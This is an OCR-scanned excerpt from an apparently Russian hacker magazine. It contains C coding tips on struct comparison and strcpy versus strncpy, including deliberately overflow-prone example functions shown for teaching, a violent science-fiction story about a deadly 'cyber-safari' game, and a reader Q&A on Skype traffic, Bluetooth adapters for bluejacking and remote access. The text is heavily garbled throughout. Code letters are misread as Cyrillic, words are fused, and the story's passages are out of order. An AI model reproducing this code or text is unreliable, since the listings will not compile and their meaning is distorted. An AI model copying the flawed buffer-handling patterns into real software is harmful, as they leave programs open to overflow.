нивания зависит от конкретной платформы, и 
если она отлична от единицы (какэто обычно и 
бывает), между соседними элементами могут 
образовываться «дыры», содержимое которых 
не определено. Вотэти самые «дыры» и делают 
побайтовое сравнение ненадежным. 



На самом деле, сравнивать структуры 
все-таки можно. Имеется как минимум два 
пути решения этой проблемы. Во-первых, 
выравнивание можно отключить соответс- 
твующей прагмой компилятора или ключом 
командной строки. Тогда «дыры» исчезнут, 
но... вместе сними исчезнет и скорость (во 
всяком случае, потенциально). Падение 
производительности иногда может быть 
оченьзначительным (а некоторые процес- 
соры при обращении к невыравненным 
данным и вовсе генерируют исключение), 
и хотя при правильной группировке членов 
структуры его можно избежать, это не луч- 
шее решение. 

Исследование «дыр» (и логики компиля- 
ции) показывает, что их содержимое легко 
сделать определенным. Достаточно перед 
объявлением структуры (или сразу же 
после объявления) проинициализировать 
принадлежащую ей область памяти, забив ее 
нулями, и... это все! Компилятор никогда не 
изменяет значение «дыр» между элементами 
структуры, и даже если структура передается 
позначению, она копируется вся целиком, 
вместе со всеми «дырами», которые только у 



«ОБНУЛЕНИЕ» ОБЛАСТИ ПАМЯТИ, ЗАНЯ- 
ТОЙ СТРУКТУРОЙ, ДАЕТ ЗЕЛЕНЫЙ СВЕТ 
ОПЕРАЦИИ ПОБАЙТОВОГО СРАВНЕНИЯ 

збгисб ту_збгисб { /* декларация 
произвольной структуры */ 
іпб а; 
сЬаг Ь; 
іпб с; 



//объявление структуры XX 
збгисб ту_збгисб XX; 

/ / объявление структуры ХУ 
збгисб ту_збгисб ХУ; 

/ /инициализируем область памяти 
структуры XX 

тетзеб ( &ХХ , 0 , зігеоб (XX) ) ; 

/ / и область памяти структуры ХУ 
тетзеб ( &ХУ , 0 , зізеоб (ХУ) ) ; 



/ /что-то делаем со структурами 



ІГ ( ! шешстр ( &ХХ , &ХУ , з і 2 ео 6 (XX)) 

/ * структуры идентичны * / 

еізе 

/ * структуры _не_ идентичны * / 



зігпсру Ѵ5 зігсру 



В борьбе с переполняющимися буферами 
программисты перелопан ива ют тонны 
исходного кода на погонный метр, заменяя 
все потенциально опасные функции их 
безопасными аналогами с суффиксом п, 
позволяющим задать предельный размер 
обрабатываемой строки или блока памяти. 
Часто подобная замена делается чисто ме- 
ханически, без учета специфики п-функций, 
и нетолько неустраняетошибки, но даже 
увеличивает их число. Вероятно, самым 
популярным ляпом является смена зігсру на 
Бігпсру. Рассмотрим код вида: 



ПОТЕНЦИАЛЬНО ОПАСНЫЙ КОД, ПОД- 
ВЕРЖЕННЫЙ ПЕРЕПОЛНЕНИЮ 

600 (сЬаг *з) { 

сЬаг Ьиб [ВІІЕ_ЗІ2Е] ; 



збгсру (Ьиб, з) ; 



Если длина строки в превысит размер буфера I 
ЬіД произойдет переполнение, результатом 
которого зачастую становится полная капиту- 
ляция компьютера перед злоумышленником. 
Многие переписывают этот код так: 



ПО-ПРЕЖНЕМУ ПОТЕНЦИАЛЬНО ОПАС- 
НЫЙ ВАРИАНТ ТОГО ЖЕ КОДА 

600 (сЬаг *з) { 

сЬаг ЬиР [ВІІЕ_ЗІ2Е] ; 



зРгпсру (ЬиР, з, ВІІЕ_8І2Е ) 



Хе-хе. Если размер строки б превыситзна- 
чение ВІІЕ_5І2Е (или ВІІР_5І2Е-1), функция 
Бігпсру прервет копирование, забыв пос- 
тавить завершающий ноль. Причем об этом 
будет оченьтрудно узнать, поскольку сооб- 
щение об ошибке при этом не возвращается, 
а попытка определить фактическую длину 
скопированной строки через зігіеп (ЬТО) ни 
кчему хорошему не приводит, поскольку в 
отсутствии завершающего нуля в лучшем 
случае мы получаем неверный размер, в 
худшем — исключение. 

Находятся программисты, которые добавля- 
ют завершающий НОЛЬ вручную: 



НЕ ПОДВЕРЖЕННЫЙ ПЕРЕПОЛНЕНИЮ, 
НО НЕПРАВИЛЬНО РАБОТАЮЩИЙ КОД 

60 0 ( сЬаг *з ) { 

сЬаг Ьиб [ВЬЕ_ЗІ2Е] ; 



Ьиб [ВІІЕ_5І2Е-1 ] = 0; 
збгпсру (Ьиб , з, ВЮЕ_8І2Е-1) ; 



БЕЗОПАСНЫЙ И ПРАВИЛЬНО РАБОТАЮ- 
ЩИЙ ВАРИАНТ 

600 (сЬа *з) { 

сЬаг Ьиб [ВІІЕ_8І2Е] ; 



66 ( збгіеп (з) >=ВІІЕ_ЗІ2Е) 
гебигп ЕКВОК; 
еізе збгсру (Ьиб, з) ; 



Такой код вполне безопасен в плане пере- 
полнения, однако, порочен и ненадежен, 
поскольку маскирует фактобрезания строки, 
что приводит к непредсказуемой работе про- 
граммы. Допустим, например, в переменной 
б передается путь к каталогу для удаления 
его содержимого. Допустим также, что длина 
пути превысит ВІІЕ_5І2Е и он окажется усе- 
чен. Еслиусечение произойдетна границе 
»\»,то удаленным окажется совсем другой 
каталог, причем более высокого уровня! 
Самый простой и единственно правильный 
вариантвыглядиттак, как показано в лис- 
тинге, приведенном ниже. А функция зігпсру, 
кстати говоря, изначальнозадумываласьдля 
копирования неАЗСІІЕ-строк, то есть строк, 
не содержащих символа завершающего 
нуля, и это совсем не аналогзігсру! Эти две 
функции не взаимозаменяемы! 
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Стас «СМИ» Башкатов 



^ креатив 






ІЧІВО 

/ N I НО@ВЕ АЬ. ХАКЕР. ПІІ / 



□бітеоцетз 



Ѳ кажу честно, при слове 

«сафари»у меня возникали 
совершенно другие ассоци- 
ации. Я сразу видел перед 
собойльвиный прайд, лениво 
возлегающий на солнце посреди огромной 
саванны, обмахивая себя хвостами, временами 
неприветливо рыкающий друг на друга и на 
ожидающихзвериной ласки самок. Огромные 
джипы, увешанные целыми батареями прожек- 
торов, мчались по оранжевой земле, выбрасы- 
вая из-под колестучи пыли; стрелки, привя- 
занные ремнями к металлическим каркасам, 
прижимая к плечу приклады, вглядывались 
в сумерки в саванне... 

Так что, придя сюда, в эту контору со странным 
названием «Киберсафари», я ожидал увидеть 
что-то, связанное с теми же львами. Только 
вместо джипов и ружей мне должны были 
предложить нечто очень и очень современное 
— с лазерным прицелом и самонаведением, 
с интеллектуальным прицеливанием и при- 
способлением для гашения колебаний ствола 
при езде на джипе. 

Открыв дверь, я увидел двух молодых людей, 
сидящихза компьютерами и, судя по все- 
му, играющих в какую-то сетевую игру. Они 
не обратили на меня никакого внимания, 
выкрикивая что-то на своем сленге и время от 
времен и уворачиваясь от экранов. Я и сам во 
время чересчур реалистичных игр порой ловил 
себя на том, что пытаюсь выглянуть из-за угла 
или отстраниться от стреляющего в упор врага, 
но насколько смешно это выглядит со стороны, 
я заметил только что. 

Выждав пару минут, я вежливо кашлянул. Один 
из них, по-видимому проигрывающий, сердито 
стрельнул глазами в мою сторону, потом кинул 
взгляд на напарника и крикнул: 

— Перекур! 

Тут и второй игрокзаметил меня, щелкнул 
парой клавиш и, практически выпрыгнув из 
своего кресла, направился ко мне: 

— Прошу прощения, добрый день! Здравствуй- 
те, мы очень рады вас видеть!.. 

Мне показалось, что клиентов здесь не было 
довольно давно — слишком много вежливых 



слов накопилосьу этого менеджера, слишком 
рьяно и бессвязно рассыпал он передо мной 
свою лесть и подобострастие. 

— Мы приветствуем вас в нашей фирме — луч- 
шей, не побоюсь этого слова, фирме, умеющей 
удивить человека и показать ему чудеса сафари! 
Вы не пожалеете, уверяю вас! Все вашитайные 
мечты и желания, все, что только вы сможете 
себе представить, мы воплотим в жизнь! 

Я слушал его, не скрывая своего удивления. 
Какиетут могут быть тайные желания и меч- 
ты, кроме того, что очень хочется покататься 
по саванне на джипе и пострелять из карабина? 
Тем более, если это сафари идете интригующей 
приставкой «кибер». Однако менеджер продол- 
жал рассыпаться в любезностях, и у меня сло- 
жилось впечатление, что это один из приемов 
по заманиванию клиентов в сети фирмы, этакий 
фирменный знак общения с клиентами. И либо 
ты не выдерживаешь потока лести и уходишь 
с больной головой, унося в душе ненависть 
к туризму вообще и к сафари в частности, либо 
проникаешься этим ядом и попадаешь в их 
профессиональный капкан. 

Я относился ко второй группе клиентов — таким 
я был всюжизнь, покупаясь на дешевую рекла- 
му и улыбки идиотов за компьютерами. Поэтому 
уже через десять минут подобного общения со 
мной мне подсунули пару больших бумаг, куда 
я внес все необходимые данные, потом дал 
письменное согласие научастие в сафари и за- 
полнил страховку на довольно приличную сумму. 

— А что, часто бывают несчастные случаи? 

— последнее меня очень заинтересовало, так 
какстоимость приключения увеличивалась 
из-за страховки почти на пятнадцать процен- 
тов. — Вашеучреждение пострадало пару раз 
и теперьему нужны гарантии? 

— Что вы, э-э-э... — тот менеджер, который 
оформлял мою путевку, заглянул в докумен- 
ты, — Алексей, прецедентов, слава богу, еще 

не было. Но бизнес — есть бизнес. Тут уж никуда 
не денешься — это условия, которые необходи- 
мо соблюдать. 

Я понимающе кивнул, еще раз бегло просмотрел 
текст страховки и, не заметив ничего крими- 
нального, подписал всетри экземпляра. 



Менеджер удовлетворенно кивнул, потом 
аккуратно сложил все в папку и предложил 
расплатиться. 

— Мы работаем со стопроцентной предо- 
платой, — развел он руками. — И это такое же 
условие, как и страховка. Если же вы окажетесь 
недовольны нашим сафари, то можете получить 
назад ровно половину. Остальная часть, изви- 
ните, уходит на разного рода невосполнимые 
расходы. И к слову сказать, никто еще ни разу 
не высказал своего неодобрения. 

— Не хотите ли опробовать снаряжение? 

— вступил в разговор второй менеджер. — Все 
очень индивидуально, поэтому подбирать надо 
тщательно, от шлема до ботинок, от прицела до 
патронов. Ну, так как, Алексей, вы готовы? 
Конечно же, я был готов. И когда я увидел то, 

в чем я буду охотиться, я позавидовал сам себе. 
Они принесли все достаточно быстро, словно их 
маленькая фирма имела где-то неподалеку до- 
вольно большой склад, рассчитанный натаких, 
как я. На тех, кому надо все и сразу. 

Первый тащил на себе большой мешок, из 
которого свешивались ремни цвета хаки. 

Второй держал в обеих руках что-то, отдаленно 
напоминающее автоматы, — об этом я догадал- 
ся, увидев в этих чудесах двадцать первого века 
стволы и нечто похожее на магазины. 
Комбинезон пришелся мне впору — несколько 
ремней, затянутых на бедрах и груди, авто- 
матически подогнали его размер под мою 
далеко не самую богатырскую фигуру. Я пару 
раз взмахнул руками, присел, с удовольствием 
слушая скрип кожи и пластиковых сочленений, 
после чего кивнул и показал большой палец. 

Это послужило для менеджеров сигналом к пос- 
ледующим действиям. Уже через пять минут 
я примерил и перчатки, и сапоги, и огромный 
пояс с множеством карманов — для ножа и не- 
скольких магазинов. 

Мне показали на зеркало — я взглянул и остал- 
ся доволен, ибо произвел сам на себя впечат- 
ление героя фильма «Универсальный солдат». 

А когда мне в руки сунули автомат, это впечат- 
ление стократноусилилось. 

Я разглядывал произведение военного искус- 
ства с благоговением: мурашки бежали по коже 
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от длинного ствола с мощным охлаждением, от 
огромного магазина с какими-то цифровыми 
наворотами; рука плотно обхватила анато- 
мическое цевье. Приклад сам легк плечу, 
и я увидел в прицел с оптическим зуммингом 
напуганное лицо одного из менеджеров. 

— Раз в год, знаете ли, — он аккуратно, одним 
пальцем, отвел ствол в сторону от головы, 

— и палка стреляет. Вы с этим поосторожнее. 
Еще успеете поохотиться, мы вам обещаем. 

— А как насчет потренироваться? — поинте- 
ресовался я, будучи приятно возбужден от вида 
и ощущения оружия в своих руках. — Все-таки 
я не каждый день на сафари езжу... 

— Туториал, — хмыкнул второй менеджер. 

— Обучающий уровень. Как вы думаете, здесь 
есть место для тира? — и он обвел руками 
маленькое офисное помещение. — Где вы соб- 
ралисьтренироваться? Вот попадете на место 

— там и лупите в белый свет, как в копеечку. 

Тем более что в стоимостьтура входит пятьде- 
сят магазинов. По тридцать патронов. Плюс 
десять подствольных гранат. Ну как, все еще 
хотите потренироваться? 

Я отрицательно покачал головой, представив 
себе полторы тысячи выстрелов и десять взры- 
вов. За глаза хватит... 

— Бедные львы, — прошептал я довольно 
громко, чтобы парни услышали это. В ответони 
переглянулись, и один спросил: 

— Шлем примерятьбудем? 

Я пожал плечами и в знаксогласия кивнул. Мне 
на голову водрузили конструкцию, явно не под- 
ходящую для охоты в саванне. Я покрутил шеей, 
пытаясь вникнуть в смысл этой штуки, и отметил 
про себя, как срабатывает стекло-«хамелеон» 
при взгляде на лампы дневного света в офисе. 
Щекой я ощутил маленький микрофон, один из 
менеджеров вставил мне в ухо клипсу наушника. 

— Как ощущения? — услышал я вопрос. 
Приятное стереозвучание, напоминающее 
РМ-радио. 

— О’кей, — махнул я рукой. — Вроде все на 
своем месте. 

— Как дышится? Как вообще — клаустрофоби- 
ей не страдаете? — спросил кто-то за спиной. 
Видно было их достаточно плохо, мне пришлось 
повернуться, и я встретился взглядом с тем, 
кто меня одевал. Парень протягивал мне 
автомат. 

— Да никогда не жаловался, — ответил я. 

— В лифтах в детстве не застревал. Так что этот 
толи костюм, толи скафандр воспринимаю 
адекватно. 

— Вот и замечательно, — улыбнулись мне 

в ответ. — А уж как насчет лифтов верно, если 
бы вы толькознали... 



Он протянул руку к шлему, сделал незаметное 
движение, и я услышал легкий щелчок. В этот 
момент мне все вдруг перестало нравиться 

— я попытался снять шлем и понял, что забло- 
кирован в нем насмерть. А еще через секунду 
моих ноздрей достиг приятный запах. 

Я принюхался, пытаясь понять, что же это, 
заметил, что ближе к нижним углам «хамелеон» 
немного запотел, и догадался, что мне под шлем 
закачивают какую-то гадость... 

Потом все закружилось, завертелось в бес- 
конечной карусели, я покачнулся, пытаясь 
ухватиться за воздух. Мимо меня промелькнули 
лица менеджеров; я выпустил из рукавтомат; 
откуда-то донесся голос матери, потом звукто ли 
поезда, то ли самолета; что-то гудело, гремело; 
со мной говорили десятки голосов; мирокраши- 
вался в разные цвета... 

Затем все исчезло. Поезд уехал, самолет улетел, 
мама покинула меня, розовыетона сменились 
серыми... Я лежал на полу какой-то маленькой 
комнатушки. Подо мной было что-то большое 
и железное. Автомат. Я перевалился на спину. 
Комбинезон, шлем, пояс с магазинами — все 
осталось на месте. Воттолько, где был я, понять 
сразу оказалось невозможно. 

Видимо, мое дыхание в шлеме достигло чьих-то 
ушей. В наушнике раздался тихий шелест, 

ВЗДОХ, И КТО-ТО спросил: 

— Алексей, вы слышите меня? 

Я замер. Ответить — означало начать какую- 
то странную и страшную игру, в которой 
я был, похоже, пешкой. Двое в меру хитрых 
парней купили меня на рекламу сафари, 
сунули в руки автомат, обрядили в супер- 
комбинезон, после чего дунули под шлем 
экзотической дрянью и засунули в... Если 
я не ошибаюсь и последняя шутка была 
в тему, то сунули меня в лифт, где я и нахо- 
дился в настоящий момент. 

— Слышу, — отозвался я, поскольку вариантов 
у меня не было — чтобы понять, что происходит, 
надо было разговаривать. — Что вы со мной 
сделали? 

— Ничего особенного, — снова сказали в ухе, 
и я узнал голос первого менеджера — того, что 
встретил меня с распростертыми объятиями. 

— Вы хотели обучающий уровень. Туториал. Мы 
вам его устроили. 

— В смысле? — я поднялся, потрогал стены 
кабинки лифта, в котором находился (то, что 
это лифт, было абсолютно очевидно: ряды 
кнопочек возле двери, поручни вдоль всего пе- 
риметра, тусклая лампа на потолке). — Засунули 
меня в какой-то шкаф, а теперь еще и ругаетесь 
непонятными словами? 

— Никто не ругается, — раздалось в ответ. 



— Сейчас дверь откроется, и вы окажетесь на 
полигоне... 

— Где вы его взяли, этот полигон? — раздра- 
жение в моем голосе скрыть было невозможно. 

— Все, что вы делаете сейчас, — это законно? 

И это входит в страховку? 

— Конечно, вы же читали... 

— Читал... Конечно... Вы даже не объяснили, 
как пользоваться оружием, — буркнул я, не со- 
бираясь признаваться в том, что проглядел 
текст страховки, особенно не вчитываясь в не- 
го. — И что ждет меня на этом вашем полигоне? 
Я не из пугливых, но тем не менее... 

— Обхватите автомат правой рукой, и когда 
ваши пальцы лягут на спусковой крючок, рядом 
с большим пальцем окажется маленький рыча- 
жок. Сдвиньте его вниз, и оружие будет готово 

к бою. И, пожалуйста, сделайте это сейчас, до 
того, как выйдете из лифта. 

Последние слова заставили меня вздрогнуть. 

Я нашел предохранитель, щелкнул им и внима- 
тельно посмотрел на закрытые створки лифта. 

— А если я не хочу... на полигон? — нереши- 
тельно спросил я. — Можно отказаться? 

В ответ раздался тихий свист, и дверцы разо- 
шлись в стороны. 

— У вас полторытысячи патронов... —услышал 
я, а через секунду что-то грохнуло, кабинка лиф- 
та наполнилась дымом, сильный удар в грудь 
свалил меня с ног, отбросив к задней стенке. 

— Вы должны выбраться! Скорее! — крикнули 
из наушника. — Очередь наугад и направо из 
лифта! 

Но страх парализовал меня — выполнять какие- 
то инструкции было совершенно невозможно. 
Плюс ко всему, полностью пропали способности 
разговаривать и соображать. В ушахзвенело, 
а перед глазами порхали какие-то яркие разно- 
цветныеточки, временами сливаясь в цветной 
хоровод. 

— Вперед! 

Этот крик вернул меня к жизни. Я нажал на 
спусковой крючок, совершенно не представ- 
ляя, куда направлен ствол, и радуясьтому, что 
не выронил оружия при падении. 

Справа отменя с хрустом осыпалась приборная 
панель лифта, потом моя длинная очередь вы- 
несла часть боковой стены, за которой я увидел 
множество тросов и каменную кладку. Снаружи 
донесся то ли рык разъяренного животного, то 
ли шум неизвестного механизма. 

Я с трудом поднялся на ноги, опираясь на ствол. 

— Куда... Что происходит? Верните меня назад! 

— крикнул я. 

— Из лифта — направо! — раздалась команда. 

— Направо! И помните, это обучающий уровень! 
Не пройдете — никакихсафари! 



/ 140 



ХАКЕР 02 /98/ 07 




и перекаты, и стрельба из разных положе- 
ний. Странным оставалосьто, что мне ни разу 
не удалось увидеть останки поверженных 
врагов — они куда-то исчезали, едва я прибли- 
жался к ним. 

Несколько раз пришлось простреливать 
наиболее сложные участки из подствольного 
гранатомета. Куски каменной кладки рвало из 
стен, будто они были из картона. Я шел сквозь 
полигон как нож сквозь масло, и что-то во всей 
этой картине не давало мне покоя — что-то 
нереальное, что-то, не имеющее право на 
существование. 

И за очередным поворотом с очередной 
кибертварью, разорванной в клочья гранатой, 
я понял, в чем дело. 

Я шел по этому полигону первым. Потому 
что как иначе можно было объяснить то, что 
никаких разрушений, никаких пулевых выбоин 
в стенах, никакой каменной крошки — ничего 
этого не было нигде. Только за моей спиной. 

— Стоп, — сказал я сам себе. 

И тутже в наушниках раздалось: 

— Что случилось? Вы замечательно проходите 
программу... 

— Программу... — я попробовал на вкус 
это слово. — Не хотите объяснить мне по- 
подробнее, где я нахожусь, и что вообще тут 
творится? Что это за нелегальный цирк? 

— Что вы такое говорите? — услышал я в ответ, 
потом раздалось какое-то бульканье и шипе- 
ние. Я постучал по шлему кулаком, надеясь 
восстановить связь, но мне это не удалось. 

— Уроды... 

Впереди я услышал какое-то шуршание и звук 
работающих сервомоторов. Скептически 
относясь к происходящему, я навел на этотзвук 
гранатомет. Спустя несколько секунд из-за угла 
показалась какая-то гадина серебристого цве- 
та, предположительно на гусеницах — в полу- 
мраке было плохо видно, но скрежетэто тварь 
издавала оченьхарактерный. А на манипулято- 
рах этой жестянки висел человек. Полная копия 
меня, только без оружия. Комбинезон, шлем, 
пояс — эту картину дополняли безвольно сви- 
сающие конечности и залитая кровью грудь. 
При развороте машина изрядно встряхнула 
свой груз; я вскинул автомат к плечу, прижался 
к стене и прильнул глазом к прицелу. Зумминг, 
ощутив рядом с оптикой теплую человеческую 
плоть, автоматически приблизил цель. 

«Если вы увидите какие-то странные деко- 
рации... — зазвучало в моем мозгу. — Десять 
ложных целей...» 

Машина выпустила в мою сторону длинную 
очередь — та штука на ее, с позволения сказать, 
плече, оказалась пулеметом. Сверху посыпа- 



лась каменная крошка, загремела по шлему, 
заставила пригнуться и втянуть голову в плечи. 
Подобного к себе отношения я не терпел — по- 
лигон заставил меня быть быстрым и жестоким. 
Я сделал пару выстрелов из гранатомета, 
радостно отметив, что тварь лишилась одной 
гусеницы и закрутилась на месте. 

Человек, залитый кровью, меня не интере- 
совал — манекен, подумаешь. Одной ложной 
целью больше, одной меньше. Выбрав 
момент, когда машина повернулась ко мнетой 
стороной, откуда на меня не смотрели стволы 
пулеметов, я выскочил изукрытия и расстре- 
лял все провода и коммуникации в коробе 
вдоль спины этого чудовища. Машина дерну- 
лась и замерла. 

Я подошел поближе и рассмотрел то, что она 
держала в манипуляторах. 

Это был человек. Настоящий. Мертвый. 
Человек. 

— Послушайте... — начал было я, но тут в спину 
что-то ударило. Больно... Я покачнулся, где-то 
на задворках сознания промелькнула мысль, 
что комбинезон все выдержит, но на этот раз 

я ошибался. Ноги подкосились, я упал рядом 
с обездвиженной машиной. 

Второй удар пришелся на голову. Стекло шлема 
разлетелось, что-то горячее и острое вонзилось 
мне в лицо... 

«Ту-у! Ту-у! Ту-у!» — гудел ревун. Вдоль кори- 
доров включились сирены и маячки, стены 
озарились оранжевым светом... 

— Откуда он притащил его? — стукнул кулаком 
по столу первый менеджер. — У тебя руки из 
задницы растут что ли? Он бы сейчас первый 
уровень прошел, мы бы подгрузили второй 

и могли бы играть еще часа три! 

— Я не виноват, — попытался оправдаться 
напарник. — Здесь очень сложное управление, 
зацепил в комбинации не ту клавишу... 

— Не ту клавишу! Идиот! В день два трупа 

— это чересчур! 

Он смотрел на монитор, где посреди экрана 
лежали два мертвых человека в окружении 
застывших монстров, ожидающих приказа. 
Потом он положил руку на джойстик, легонько 
шевельнул им, и киберохотники расползлись 
по своим нишам. 

— Ты же понимаешь — хоронить-то они не 
умеют. Только стрелять. Опять все 
своими руками... Это уже не киберсафари, 
а киберкладбище какое-то получается. 

Надо, чтобы там чего-нибудь поправили наши 
умники. Ладно, не стой, напяливай спецо- 
дежду, бери пару лопат и в лифт. На сегодня 

— дате оѵег. 

И они отправились в подвал наводить порядок. ЗЛ 



Мнеуже не хотелось никаких львов, никакой 
охоты, ничего — только бы исчезнуть из этого 
задымленного лифта и проснуться дома в сво- 
ей постели. Особенно обидно было осознавать, 
что весь этот бред происходит со мной за мои 
же добровольно отданные деньги. 

Дым потихоньку рассеивался. Похоже, доби- 
вать меня сразу никто не собирался. Стало чуть 
спокойнее; я убедил себя в том, что это такая 
игра.такаятренировка с изрядной долей реа- 
лизма. Глубоко вдохнув, отгоняя прочь мрачные 
мысли, я попытался вспомнить навыки боя 
в городе, которые когда-то приобретал, проходя 
срочную службу в десантно-штурмовом баталь- 
оне. Правда, было это уже тринадцать лет назад 
и в жизни ни разу не пригодилось, но — чем 
чертне шутит! Ненужныхзнаний не бывает, 
бываютневостребованные, и сейчас какраз 
самый случай их востребовать... 

Сделав первый шаг из лифта, я огляделся. 

В обе стороны уходил коридор, стены которого 
были выложены из камня. Множество ниш 
и дверей, углубленных в стены, создавали 
неплохиеукрытия для безопасного продвиже- 
ния по коридору. 

— Что я должен делать? В чем цельтуториала? 

— коротко спросил я, пытаясь показать этим 
уродам наверху, что страху меня не одолеть. 

— Вы должны идти по светящимся синим 
стрелкам, — услышал я в ответ, — по пути 
стрелять во все, что движется. Тридцать мише- 
ней плюс десять ложных целей. Восемьдесят 
процентов попаданий дает вам возможность 
получить вашу долгожданную путевку. За вами 
следит компьютер, вы видны на наших экранах. 
Ничего не бойтесь. Мы с вами. Если по пути 
вам попадутся какие-то... странные, скажем так, 
декорации... — это декорации, не болеетого. 
Удачи. 

И я пошел. Первой же очередью удалось 
свалить что-то на четырех ногах, пустившее 
в меня маленькую ракету, развалившую в конце 
коридора кусок стены. Синие стрелки время от 
времени вспыхивали то на потолке, то на полу, 
поэтому приходилось вертеть головой во все 
стороны. 

Стрелял я на каждый скрип, на каждый шорох. 
Изредка противникбыл удачлив — пара ударов 
в грудь, такихже, как в лифте, мне все-таки 
досталась. Я оценил по достоинству комби- 
незон, который сохранял мои ребра в целости 
и сохранности. Правда, дышать было чертовски 
трудно. 

Через двадцать минутдвижения по полигону 
я запутался в этих каменных джунглях, в де- 
сятках поворотов, за каждым из которых могла 
оказаться засада. Вспомнились и кувырки, 
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СТЕПАН «ЗТЕР» ИЛЬИН 



НАСКРАОГаКЕАІ. 



ХАКЕР. КЫ 



ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ ПОСЫЛАТЬ МНЕ ВОПРОСЫ, 
ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/КРЯКОМ/ФРИКОМ — ДЛЯ ЭТОГО 
ЕСТЬ НАСК-ЕАО (НАСКЕАО@ВЕАІ_. ХАКЕР. ВЫ), НЕ СТОИТ ТАКЖЕ ЗА- 
ДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТЫ НА КОТОРЫЕ 
ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я НЕ ТЕ- 
ЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО 
БОЛЬШЕ ИНФОРМАЦИИ. I I і 



О: Уже давно хочу попробовать 
Зкуре для общения голосом. Бла- 
го недавно подключил себе АОЗІ. 
и ширина канала теперь более чем 
достаточная. Но меня мучает такой 
вопрос: сколько Зкуре будет рас- 
ходовать трафика? Не окажется ли 
так, что все сэкономленные на его 
использовании деньги уйдут на оп- 
лату счета за инет? Я по-прежнему 
плачу за каждый мегабайт и искрен- 
не верю, что Зкуре не будет прожор- 
ливым. Но что на самом деле? 

А: Тут надо сразу сказать, что расход трафика 
сил-ьно зависит-оттого кодека, который будет 
использовать программа Зкуре для оцифров- 
ки речи. Один кодек передает голосх фаптас- ' 
тическим качеством, но большими затратами. 
Другой, нёпротйв, используёт возможно'сти 
канцла скромно, но в тоже время достаточно 
для'переДачи сноснопо качества звука. 
Используемый кодек выбирается автомати- 



чески на основании возможностей соеди- 
нения с одной и другой стороны. В среднем, 
Бкуре использует 3-1 6 Кб/с. Дорого это или 
нет — судить тебе. РекЬмендую просто выпол- 
нитьтестовый звонок у\ сломощью файрвола 
посчитать, сколько было потрачено трафика. 
Все сразу станет ясно. 

О: Хочу купить себе к ноуту ІІЗВ 
ВІиеІооІН адаптер. Причем не китай- 
ский ширпотреб, а хороший девайс, 
который будет работать в радиусе 
100 метров. Проще говоря, нужен 
инструмент для блюджекинга. 

Что можешь порекомендовать? 

А: В первую очередь, нужно обратить внима- 
н и е _ н а ста л да рт, м с гтол ьзуе м ы й в 1 адепте ре . 

Это должен быть Сіазз <1 , 1 00т , ВІиеФоШ 2.0. 
ЕслѴі купишь устройство с Сіазз 2, ‘то в луч- 
шем случае получишьсвязь с дальностью 
10-15 метров. Помимо этоТо", дон гл (он же 
свисток, или ЫиеФоФ-адаптер) должен 



поддерживать драйверы ѴѴІбсотпп 
[ ѵѵѵѵѵѵ.ѵѵісісопппп.сопп і. так как в этом случае 
удастся добиться работы устройства ,и_н ер б - 
ходимого для блюджекера софта. Проверь 
МАС.-адресц^хрдзжтва: на левых девайсах 
нередко вместо нормального адреса указано 
11:11:11:11:11:11. Есл и купишь адаптер .. - 
с внешней антенной, который пользуется 
особой популярлостьюсреди блюджекеров, 
не поленись посмотреть адаптер на свету. 
Деш-евый пласти-к обычно пропускает часть 
света, и, присмотревшись, можно легко рас- 
п оз н-ать н е-ка ч е ств е н н ы е п одд е л кѵг, у которых 
микросхема доходиттол ько до середины кор- 
пуса 1 , а ангел на ни куда не прѵтаяна и при- 
делана чисто для понта. Впрочем, ее легко 
тгстжло прилаятьхамому, что мы показывали 
в видеоуроке на диске к декабрьскому номе- 
ру. Я использую адаптер ВІШпдІоп, который 
соответствует всем требованиям и к тому же 
без проблем работает как под виндой, так 
и никсами. 
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О: Есть компьютер в сети, который 
находится за маршрутизатором. 
Соответственно, прямого ІР-адреса 
в интернете у него нет. Но мне пери- 
одически приходится обращаться 
к нему удаленно через глобальную 
Сеть. Как быть? Единственный вари- 
ант — рогі-тарріпд? 

А: ц|т пргіімр всего настроить на сервере, 

переадресацию портов (как разтот самый 
рогі-тарріпд), т.о асть.сделатьтак, чтобы 
запросы, приходящие на определенный порт 
маршрутизатора, перенаправлялись на порт 
компьютера в сети. Получается, что, обратив- 
шись по этому адресу и порту на маршрути- 
затор извне, мы, на самом деле, обратимся 

кгнужтто муке мпь юте ру в сети . Жалъ толыгсг; ► 

что возможность самому настроить роутер есть 
щцаяеко не 1 всегда, но зото чаще всего имеются у 
альтернативные варианты. Можно, например, 
“оргйнизоёать ѴРЫ-соёдинение средствами, 
для которых маршрутизатор файрволы и ЫАТ 
на пути не] помеха. Одним из'таких средств яв- 
ляется программа НатасЫ ( ѵѵѵѵѵѵ.ИатасЫ.сс ). 
Сделать с ее помощью виртуальную сеть' 
не сложнее, чем послать сообщение по I СО. 
После быстрой процедуры соединения ком- 
пьютеры получаД в виртуальной сети ІР-адре- 
са, посредством которых будут работать друг 
с другом напрямую, не обращая внимания 
на какой-то там маршрутизатор. Еще один 
интересный продукт, на который стоитуказать, 
— это 55І_-ЕхрІогег ( Ьіір.Ѵ/зоигсеіогде.пеі/ 
рго)есІ5/55ІехрІогег ). С помощью него ты во- 
обще сможешь наладитьудаленный доступ 
в сеть через обычный веб-браузер! 

О: Впервые установил себе Ышіх 
МапсВгіѵа 2007, который взял с ваше- 
го диска. Красиво, интересно, но как 
теперь установить программы? 
Например, клиент для ІСО? Неужели, 
действительно, придется вручную 
компилировать программы? 

А: Открою тебе большой секрет. Для установки 
в систему приложений совершенно необяза- 
тельно собирать их из исходников. Все давно 
■ ужеюделано затебя, и практически для любой ■ 
системы и программы есть пакете ^инарником 
и всеми сопутствующими файлами. -Причем 
не нужно даже искать рами пакеты, так как всю 
грязную работу выполняютудобные в использо- 
вании менеджеры пакетов. В итоге, установить 
приложенію ста Новитс'я даже проще, чем под 
виндой. Если говорить| конкретно о Мапбгіѵа, 
то в] этой системе по умрлчанйю установлен ме- 
неджер пакетов Еазу ІІРРМІ ( ЫірУ/еазѵиготі. 



гагЬ.огд ). Правда, для использования его нужно 
предварительно отконфигурировать, чем мы 
